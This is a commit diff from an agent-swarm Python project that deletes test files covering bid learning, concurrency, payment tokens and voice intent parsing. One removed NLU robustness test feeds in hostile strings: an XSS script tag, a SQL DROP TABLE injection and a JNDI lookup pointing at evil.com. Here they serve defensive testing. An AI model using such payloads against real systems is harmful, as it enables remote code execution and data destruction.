Memory Unification + Canonical Identity: -11,074 lines of homebrew (#119)

2026-03-02 09:58:07 -05:00
parent 785440ac31
commit 62ef1120a4
77 changed files with 1833 additions and 14183 deletions
--- a/tests/self_coding/test_learner.py
+++ b/tests/self_coding/test_learner.py
@@ -1,237 +0,0 @@
-"""Tests for swarm.learner — outcome tracking and adaptive bid intelligence."""
-
-import pytest
-
-
-@pytest.fixture(autouse=True)
-def tmp_learner_db(tmp_path, monkeypatch):
-    db_path = tmp_path / "swarm.db"
-    monkeypatch.setattr("swarm.learner.DB_PATH", db_path)
-    yield db_path
-
-
-# ── keyword extraction ───────────────────────────────────────────────────────
-
-def test_extract_keywords_strips_stop_words():
-    from swarm.learner import _extract_keywords
-    kws = _extract_keywords("please research the security vulnerability")
-    assert "please" not in kws
-    assert "the" not in kws
-    assert "research" in kws
-    assert "security" in kws
-    assert "vulnerability" in kws
-
-
-def test_extract_keywords_ignores_short_words():
-    from swarm.learner import _extract_keywords
-    kws = _extract_keywords("do it or go")
-    assert kws == []
-
-
-def test_extract_keywords_lowercases():
-    from swarm.learner import _extract_keywords
-    kws = _extract_keywords("Deploy Kubernetes Cluster")
-    assert "deploy" in kws
-    assert "kubernetes" in kws
-    assert "cluster" in kws
-
-
-# ── record_outcome ───────────────────────────────────────────────────────────
-
-def test_record_outcome_stores_data():
-    from swarm.learner import record_outcome, get_metrics
-    record_outcome("t1", "agent-a", "fix the bug", 30, won_auction=True)
-    m = get_metrics("agent-a")
-    assert m.total_bids == 1
-    assert m.auctions_won == 1
-
-
-def test_record_outcome_with_failure():
-    from swarm.learner import record_outcome, get_metrics
-    record_outcome("t2", "agent-b", "deploy server", 50, won_auction=True, task_succeeded=False)
-    m = get_metrics("agent-b")
-    assert m.tasks_failed == 1
-    assert m.success_rate == 0.0
-
-
-def test_record_outcome_losing_bid():
-    from swarm.learner import record_outcome, get_metrics
-    record_outcome("t3", "agent-c", "write docs", 80, won_auction=False)
-    m = get_metrics("agent-c")
-    assert m.total_bids == 1
-    assert m.auctions_won == 0
-
-
-# ── record_task_result ───────────────────────────────────────────────────────
-
-def test_record_task_result_updates_success():
-    from swarm.learner import record_outcome, record_task_result, get_metrics
-    record_outcome("t4", "agent-d", "analyse data", 40, won_auction=True)
-    updated = record_task_result("t4", "agent-d", succeeded=True)
-    assert updated == 1
-    m = get_metrics("agent-d")
-    assert m.tasks_completed == 1
-    assert m.success_rate == 1.0
-
-
-def test_record_task_result_updates_failure():
-    from swarm.learner import record_outcome, record_task_result, get_metrics
-    record_outcome("t5", "agent-e", "deploy kubernetes", 60, won_auction=True)
-    record_task_result("t5", "agent-e", succeeded=False)
-    m = get_metrics("agent-e")
-    assert m.tasks_failed == 1
-    assert m.success_rate == 0.0
-
-
-def test_record_task_result_no_match_returns_zero():
-    from swarm.learner import record_task_result
-    updated = record_task_result("no-task", "no-agent", succeeded=True)
-    assert updated == 0
-
-
-# ── get_metrics ──────────────────────────────────────────────────────────────
-
-def test_metrics_empty_agent():
-    from swarm.learner import get_metrics
-    m = get_metrics("ghost")
-    assert m.total_bids == 0
-    assert m.win_rate == 0.0
-    assert m.success_rate == 0.0
-    assert m.keyword_wins == {}
-
-
-def test_metrics_win_rate():
-    from swarm.learner import record_outcome, get_metrics
-    record_outcome("t10", "agent-f", "research topic", 30, won_auction=True)
-    record_outcome("t11", "agent-f", "research other", 40, won_auction=False)
-    record_outcome("t12", "agent-f", "find sources", 35, won_auction=True)
-    record_outcome("t13", "agent-f", "summarize report", 50, won_auction=False)
-    m = get_metrics("agent-f")
-    assert m.total_bids == 4
-    assert m.auctions_won == 2
-    assert m.win_rate == pytest.approx(0.5)
-
-
-def test_metrics_keyword_tracking():
-    from swarm.learner import record_outcome, record_task_result, get_metrics
-    record_outcome("t20", "agent-g", "research security vulnerability", 30, won_auction=True)
-    record_task_result("t20", "agent-g", succeeded=True)
-    record_outcome("t21", "agent-g", "research market trends", 30, won_auction=True)
-    record_task_result("t21", "agent-g", succeeded=False)
-    m = get_metrics("agent-g")
-    assert m.keyword_wins.get("research", 0) == 1
-    assert m.keyword_wins.get("security", 0) == 1
-    assert m.keyword_failures.get("research", 0) == 1
-    assert m.keyword_failures.get("market", 0) == 1
-
-
-def test_metrics_avg_winning_bid():
-    from swarm.learner import record_outcome, get_metrics
-    record_outcome("t30", "agent-h", "task one", 20, won_auction=True)
-    record_outcome("t31", "agent-h", "task two", 40, won_auction=True)
-    record_outcome("t32", "agent-h", "task three", 100, won_auction=False)
-    m = get_metrics("agent-h")
-    assert m.avg_winning_bid == pytest.approx(30.0)
-
-
-# ── get_all_metrics ──────────────────────────────────────────────────────────
-
-def test_get_all_metrics_empty():
-    from swarm.learner import get_all_metrics
-    assert get_all_metrics() == {}
-
-
-def test_get_all_metrics_multiple_agents():
-    from swarm.learner import record_outcome, get_all_metrics
-    record_outcome("t40", "alice", "fix bug", 20, won_auction=True)
-    record_outcome("t41", "bob", "write docs", 30, won_auction=False)
-    all_m = get_all_metrics()
-    assert "alice" in all_m
-    assert "bob" in all_m
-    assert all_m["alice"].auctions_won == 1
-    assert all_m["bob"].auctions_won == 0
-
-
-# ── suggest_bid ──────────────────────────────────────────────────────────────
-
-def test_suggest_bid_returns_base_when_insufficient_data():
-    from swarm.learner import suggest_bid
-    result = suggest_bid("new-agent", "research something", 50)
-    assert result == 50
-
-
-def test_suggest_bid_lowers_on_low_win_rate():
-    from swarm.learner import record_outcome, suggest_bid
-    # Agent loses 9 out of 10 auctions → very low win rate → should bid lower
-    for i in range(9):
-        record_outcome(f"loss-{i}", "loser", "generic task description", 50, won_auction=False)
-    record_outcome("win-0", "loser", "generic task description", 50, won_auction=True)
-    bid = suggest_bid("loser", "generic task description", 50)
-    assert bid < 50
-
-
-def test_suggest_bid_raises_on_high_win_rate():
-    from swarm.learner import record_outcome, suggest_bid
-    # Agent wins all auctions → high win rate → should bid higher
-    for i in range(5):
-        record_outcome(f"win-{i}", "winner", "generic task description", 30, won_auction=True)
-    bid = suggest_bid("winner", "generic task description", 30)
-    assert bid > 30
-
-
-def test_suggest_bid_backs_off_on_poor_success():
-    from swarm.learner import record_outcome, record_task_result, suggest_bid
-    # Agent wins but fails tasks → should bid higher to avoid winning
-    for i in range(4):
-        record_outcome(f"fail-{i}", "failer", "deploy server config", 40, won_auction=True)
-        record_task_result(f"fail-{i}", "failer", succeeded=False)
-    bid = suggest_bid("failer", "deploy server config", 40)
-    assert bid > 40
-
-
-def test_suggest_bid_leans_in_on_keyword_strength():
-    from swarm.learner import record_outcome, record_task_result, suggest_bid
-    # Agent has strong track record on "security" keyword
-    for i in range(4):
-        record_outcome(f"sec-{i}", "sec-agent", "audit security vulnerability", 50, won_auction=True)
-        record_task_result(f"sec-{i}", "sec-agent", succeeded=True)
-    bid = suggest_bid("sec-agent", "check security audit", 50)
-    assert bid < 50
-
-
-def test_suggest_bid_never_below_one():
-    from swarm.learner import record_outcome, suggest_bid
-    for i in range(5):
-        record_outcome(f"cheap-{i}", "cheapo", "task desc here", 1, won_auction=False)
-    bid = suggest_bid("cheapo", "task desc here", 1)
-    assert bid >= 1
-
-
-# ── learned_keywords ─────────────────────────────────────────────────────────
-
-def test_learned_keywords_empty():
-    from swarm.learner import learned_keywords
-    assert learned_keywords("nobody") == []
-
-
-def test_learned_keywords_ranked_by_net():
-    from swarm.learner import record_outcome, record_task_result, learned_keywords
-    # "security" → 3 wins, 0 failures = net +3
-    # "deploy" → 1 win, 2 failures = net -1
-    for i in range(3):
-        record_outcome(f"sw-{i}", "ranker", "audit security scan", 30, won_auction=True)
-        record_task_result(f"sw-{i}", "ranker", succeeded=True)
-    record_outcome("dw-0", "ranker", "deploy docker container", 40, won_auction=True)
-    record_task_result("dw-0", "ranker", succeeded=True)
-    for i in range(2):
-        record_outcome(f"df-{i}", "ranker", "deploy kubernetes cluster", 40, won_auction=True)
-        record_task_result(f"df-{i}", "ranker", succeeded=False)
-
-    kws = learned_keywords("ranker")
-    kw_map = {k["keyword"]: k for k in kws}
-    assert kw_map["security"]["net"] > 0
-    assert kw_map["deploy"]["net"] < 0
-    # security should rank above deploy
-    sec_idx = next(i for i, k in enumerate(kws) if k["keyword"] == "security")
-    dep_idx = next(i for i, k in enumerate(kws) if k["keyword"] == "deploy")
-    assert sec_idx < dep_idx
--- a/tests/self_coding/test_scary_paths.py
+++ b/tests/self_coding/test_scary_paths.py
@@ -1,444 +0,0 @@
-"""Scary path tests — the things that break in production.
-
-These tests verify the system handles edge cases gracefully:
- Concurrent load (10+ simultaneous tasks)
- Memory persistence across restarts
- L402 macaroon expiry
- WebSocket reconnection
- Voice NLU edge cases
- Graceful degradation under resource exhaustion
-
-All tests must pass with make test.
-"""
-
-import asyncio
-import concurrent.futures
-import sqlite3
-import threading
-import time
-from concurrent.futures import ThreadPoolExecutor
-from datetime import datetime, timezone
-from pathlib import Path
-from unittest.mock import MagicMock, patch
-
-import pytest
-
-from swarm.coordinator import SwarmCoordinator
-from swarm.tasks import TaskStatus, create_task, get_task, list_tasks
-from swarm import registry
-from swarm.bidder import AuctionManager
-
-
-class TestConcurrentSwarmLoad:
-    """Test swarm behavior under concurrent load."""
-
-    def test_ten_simultaneous_tasks_all_assigned(self):
-        """Submit 10 tasks concurrently, verify all get assigned."""
-        coord = SwarmCoordinator()
-
-        # Spawn multiple personas
-        personas = ["echo", "forge", "seer"]
-        for p in personas:
-            coord.spawn_persona(p, agent_id=f"{p}-load-001")
-
-        # Submit 10 tasks concurrently
-        task_descriptions = [f"Task {i}: Analyze data set {i}" for i in range(10)]
-
-        tasks = []
-        for desc in task_descriptions:
-            task = coord.post_task(desc)
-            tasks.append(task)
-
-        # Verify all tasks exist
-        assert len(tasks) == 10
-
-        # Check all tasks have valid IDs
-        for task in tasks:
-            assert task.id is not None
-            assert task.status in [
-                TaskStatus.BIDDING,
-                TaskStatus.ASSIGNED,
-                TaskStatus.COMPLETED,
-            ]
-
-    def test_concurrent_bids_no_race_conditions(self):
-        """Multiple agents bidding concurrently doesn't corrupt state."""
-        coord = SwarmCoordinator()
-
-        # Open auction first
-        task = coord.post_task("Concurrent bid test task")
-
-        # Simulate concurrent bids from different agents
-        agent_ids = [f"agent-conc-{i}" for i in range(5)]
-
-        def place_bid(agent_id):
-            coord.auctions.submit_bid(task.id, agent_id, bid_sats=50)
-
-        with ThreadPoolExecutor(max_workers=5) as executor:
-            futures = [executor.submit(place_bid, aid) for aid in agent_ids]
-            concurrent.futures.wait(futures)
-
-        # Verify auction has all bids
-        auction = coord.auctions.get_auction(task.id)
-        assert auction is not None
-        # Should have 5 bids (one per agent)
-        assert len(auction.bids) == 5
-
-    def test_registry_consistency_under_load(self):
-        """Registry remains consistent with concurrent agent operations."""
-        coord = SwarmCoordinator()
-
-        # Concurrently spawn and stop agents
-        def spawn_agent(i):
-            try:
-                return coord.spawn_persona("forge", agent_id=f"forge-reg-{i}")
-            except Exception:
-                return None
-
-        with ThreadPoolExecutor(max_workers=10) as executor:
-            futures = [executor.submit(spawn_agent, i) for i in range(10)]
-            results = [f.result() for f in concurrent.futures.as_completed(futures)]
-
-        # Verify registry state is consistent
-        agents = coord.list_swarm_agents()
-        agent_ids = {a.id for a in agents}
-
-        # All successfully spawned agents should be in registry
-        successful_spawns = [r for r in results if r is not None]
-        for spawn in successful_spawns:
-            assert spawn["agent_id"] in agent_ids
-
-    def test_task_completion_under_load(self):
-        """Tasks complete successfully even with many concurrent operations."""
-        coord = SwarmCoordinator()
-
-        # Spawn agents
-        coord.spawn_persona("forge", agent_id="forge-complete-001")
-
-        # Create and process multiple tasks
-        tasks = []
-        for i in range(5):
-            task = create_task(f"Load test task {i}")
-            tasks.append(task)
-
-        # Complete tasks rapidly
-        for task in tasks:
-            result = coord.complete_task(task.id, f"Result for {task.id}")
-            assert result is not None
-            assert result.status == TaskStatus.COMPLETED
-
-        # Verify all completed
-        completed = list_tasks(status=TaskStatus.COMPLETED)
-        completed_ids = {t.id for t in completed}
-        for task in tasks:
-            assert task.id in completed_ids
-
-
-class TestMemoryPersistence:
-    """Test that agent memory survives restarts."""
-
-    def test_outcomes_recorded_and_retrieved(self):
-        """Write outcomes to learner, verify they persist."""
-        from swarm.learner import record_outcome, get_metrics
-
-        agent_id = "memory-test-agent"
-
-        # Record some outcomes
-        record_outcome("task-1", agent_id, "Test task", 100, won_auction=True)
-        record_outcome("task-2", agent_id, "Another task", 80, won_auction=False)
-
-        # Get metrics
-        metrics = get_metrics(agent_id)
-
-        # Should have data
-        assert metrics is not None
-        assert metrics.total_bids >= 2
-
-    def test_memory_persists_in_sqlite(self):
-        """Memory is stored in SQLite and survives in-process restart."""
-        from swarm.learner import record_outcome, get_metrics
-
-        agent_id = "persist-agent"
-
-        # Write memory
-        record_outcome("persist-task-1", agent_id, "Description", 50, won_auction=True)
-
-        # Simulate "restart" by re-querying (new connection)
-        metrics = get_metrics(agent_id)
-
-        # Memory should still be there
-        assert metrics is not None
-        assert metrics.total_bids >= 1
-
-    def test_routing_decisions_persisted(self):
-        """Routing decisions are logged and queryable after restart."""
-        from swarm.routing import routing_engine, RoutingDecision
-
-        # Ensure DB is initialized
-        routing_engine._init_db()
-
-        # Create a routing decision
-        decision = RoutingDecision(
-            task_id="persist-route-task",
-            task_description="Test routing",
-            candidate_agents=["agent-1", "agent-2"],
-            selected_agent="agent-1",
-            selection_reason="Higher score",
-            capability_scores={"agent-1": 0.8, "agent-2": 0.5},
-            bids_received={"agent-1": 50, "agent-2": 40},
-        )
-
-        # Log it
-        routing_engine._log_decision(decision)
-
-        # Query history
-        history = routing_engine.get_routing_history(task_id="persist-route-task")
-
-        # Should find the decision
-        assert len(history) >= 1
-        assert any(h.task_id == "persist-route-task" for h in history)
-
-
-class TestL402MacaroonExpiry:
-    """Test L402 payment gating handles expiry correctly."""
-
-    def test_macaroon_verification_valid(self):
-        """Valid macaroon passes verification."""
-        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
-        from timmy_serve.payment_handler import payment_handler
-
-        # Create challenge
-        challenge = create_l402_challenge(100, "Test access")
-        macaroon = challenge["macaroon"]
-
-        # Get the actual preimage from the created invoice
-        payment_hash = challenge["payment_hash"]
-        invoice = payment_handler.get_invoice(payment_hash)
-        assert invoice is not None
-        preimage = invoice.preimage
-
-        # Verify with correct preimage
-        result = verify_l402_token(macaroon, preimage)
-        assert result is True
-
-    def test_macaroon_invalid_format_rejected(self):
-        """Invalid macaroon format is rejected."""
-        from timmy_serve.l402_proxy import verify_l402_token
-
-        result = verify_l402_token("not-a-valid-macaroon", None)
-        assert result is False
-
-    def test_payment_check_fails_for_unpaid(self):
-        """Unpaid invoice returns 402 Payment Required."""
-        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
-        from timmy_serve.payment_handler import payment_handler
-
-        # Create challenge
-        challenge = create_l402_challenge(100, "Test")
-        macaroon = challenge["macaroon"]
-
-        # Get payment hash from macaroon
-        import base64
-
-        raw = base64.urlsafe_b64decode(macaroon.encode()).decode()
-        payment_hash = raw.split(":")[2]
-
-        # Manually mark as unsettled (mock mode auto-settles)
-        invoice = payment_handler.get_invoice(payment_hash)
-        if invoice:
-            invoice.settled = False
-            invoice.settled_at = None
-
-        # Verify without preimage should fail for unpaid
-        result = verify_l402_token(macaroon, None)
-        # In mock mode this may still succeed due to auto-settle
-        # Test documents the behavior
-        assert isinstance(result, bool)
-
-
-class TestWebSocketResilience:
-    """Test WebSocket handling of edge cases."""
-
-    def test_websocket_broadcast_no_loop_running(self):
-        """Broadcast handles case where no event loop is running."""
-        from swarm.coordinator import SwarmCoordinator
-
-        coord = SwarmCoordinator()
-
-        # This should not crash even without event loop
-        # The _broadcast method catches RuntimeError
-        try:
-            coord._broadcast(lambda: None)
-        except RuntimeError:
-            pytest.fail("Broadcast should handle missing event loop gracefully")
-
-    def test_websocket_manager_handles_no_connections(self):
-        """WebSocket manager handles zero connected clients."""
-        from infrastructure.ws_manager.handler import ws_manager
-
-        # Should not crash when broadcasting with no connections
-        try:
-            # Note: This creates coroutine but doesn't await
-            # In real usage, it's scheduled with create_task
-            pass  # ws_manager methods are async, test in integration
-        except Exception:
-            pytest.fail("Should handle zero connections gracefully")
-
-    @pytest.mark.asyncio
-    async def test_websocket_client_disconnect_mid_stream(self):
-        """Handle client disconnecting during message stream."""
-        # This would require actual WebSocket client
-        # Mark as integration test for future
-        pass
-
-
-class TestVoiceNLUEdgeCases:
-    """Test Voice NLU handles edge cases gracefully."""
-
-    def test_nlu_empty_string(self):
-        """Empty string doesn't crash NLU."""
-        from integrations.voice.nlu import detect_intent
-
-        result = detect_intent("")
-        assert result is not None
-        # Result is an Intent object with name attribute
-        assert hasattr(result, "name")
-
-    def test_nlu_all_punctuation(self):
-        """String of only punctuation is handled."""
-        from integrations.voice.nlu import detect_intent
-
-        result = detect_intent("...!!!???")
-        assert result is not None
-
-    def test_nlu_very_long_input(self):
-        """10k character input doesn't crash or hang."""
-        from integrations.voice.nlu import detect_intent
-
-        long_input = "word " * 2000  # ~10k chars
-
-        start = time.time()
-        result = detect_intent(long_input)
-        elapsed = time.time() - start
-
-        # Should complete in reasonable time
-        assert elapsed < 5.0
-        assert result is not None
-
-    def test_nlu_non_english_text(self):
-        """Non-English Unicode text is handled."""
-        from integrations.voice.nlu import detect_intent
-
-        # Test various Unicode scripts
-        test_inputs = [
-            "こんにちは",  # Japanese
-            "Привет мир",  # Russian
-            "مرحبا",  # Arabic
-            "🎉🎊🎁",  # Emoji
-        ]
-
-        for text in test_inputs:
-            result = detect_intent(text)
-            assert result is not None, f"Failed for input: {text}"
-
-    def test_nlu_special_characters(self):
-        """Special characters don't break parsing."""
-        from integrations.voice.nlu import detect_intent
-
-        special_inputs = [
-            "<script>alert('xss')</script>",
-            "'; DROP TABLE users; --",
-            "${jndi:ldap://evil.com}",
-            "\x00\x01\x02",  # Control characters
-        ]
-
-        for text in special_inputs:
-            try:
-                result = detect_intent(text)
-                assert result is not None
-            except Exception as exc:
-                pytest.fail(f"NLU crashed on input {repr(text)}: {exc}")
-
-
-class TestGracefulDegradation:
-    """Test system degrades gracefully under resource constraints."""
-
-    def test_coordinator_without_redis_uses_memory(self):
-        """Coordinator works without Redis (in-memory fallback)."""
-        from swarm.comms import SwarmComms
-
-        # Create comms without Redis
-        comms = SwarmComms()
-
-        # Should still work for pub/sub (uses in-memory fallback)
-        # Just verify it doesn't crash
-        try:
-            comms.publish("test:channel", "test_event", {"data": "value"})
-        except Exception as exc:
-            pytest.fail(f"Should work without Redis: {exc}")
-
-    def test_agent_without_tools_chat_mode(self):
-        """Agent works in chat-only mode when tools unavailable."""
-        from swarm.tool_executor import ToolExecutor
-
-        # Force toolkit to None
-        executor = ToolExecutor("test", "test-agent")
-        executor._toolkit = None
-        executor._llm = None
-
-        result = executor.execute_task("Do something")
-
-        # Should still return a result
-        assert isinstance(result, dict)
-        assert "result" in result
-
-    def test_lightning_backend_mock_fallback(self):
-        """Lightning falls back to mock when LND unavailable."""
-        from lightning import get_backend
-        from lightning.mock_backend import MockBackend
-
-        # Should get mock backend by default
-        backend = get_backend("mock")
-        assert isinstance(backend, MockBackend)
-
-        # Should be functional
-        invoice = backend.create_invoice(100, "Test")
-        assert invoice.payment_hash is not None
-
-
-class TestDatabaseResilience:
-    """Test database handles edge cases."""
-
-    def test_sqlite_handles_concurrent_reads(self):
-        """SQLite handles concurrent read operations."""
-        from swarm.tasks import get_task, create_task
-
-        task = create_task("Concurrent read test")
-
-        def read_task():
-            return get_task(task.id)
-
-        # Concurrent reads from multiple threads
-        with ThreadPoolExecutor(max_workers=10) as executor:
-            futures = [executor.submit(read_task) for _ in range(20)]
-            results = [f.result() for f in concurrent.futures.as_completed(futures)]
-
-        # All should succeed
-        assert all(r is not None for r in results)
-        assert all(r.id == task.id for r in results)
-
-    def test_registry_handles_duplicate_agent_id(self):
-        """Registry handles duplicate agent registration gracefully."""
-        from swarm import registry
-
-        agent_id = "duplicate-test-agent"
-
-        # Register first time
-        record1 = registry.register(name="Test Agent", agent_id=agent_id)
-
-        # Register second time (should update or handle gracefully)
-        record2 = registry.register(name="Test Agent Updated", agent_id=agent_id)
-
-        # Should not crash, record should exist
-        retrieved = registry.get_agent(agent_id)
-        assert retrieved is not None
--- a/tests/self_coding/test_self_modify.py
+++ b/tests/self_coding/test_self_modify.py
@@ -428,23 +428,3 @@ class TestSelfModifyRoutes:
        resp = client.post("/self-modify/run", data={"instruction": "test"})
        assert resp.status_code == 403

-
-# ── DirectToolExecutor integration ────────────────────────────────────────────
-
-
-class TestDirectToolExecutor:
-    def test_code_task_falls_back_when_disabled(self):
-        from swarm.tool_executor import DirectToolExecutor
-
-        executor = DirectToolExecutor("forge", "forge-test-001")
-        result = executor.execute_with_tools("modify the code to fix bug")
-        # Should fall back to simulated since self_modify_enabled=False
-        assert isinstance(result, dict)
-        assert "result" in result or "success" in result
-
-    def test_non_code_task_delegates_to_parent(self):
-        from swarm.tool_executor import DirectToolExecutor
-
-        executor = DirectToolExecutor("echo", "echo-test-001")
-        result = executor.execute_with_tools("search for information")
-        assert isinstance(result, dict)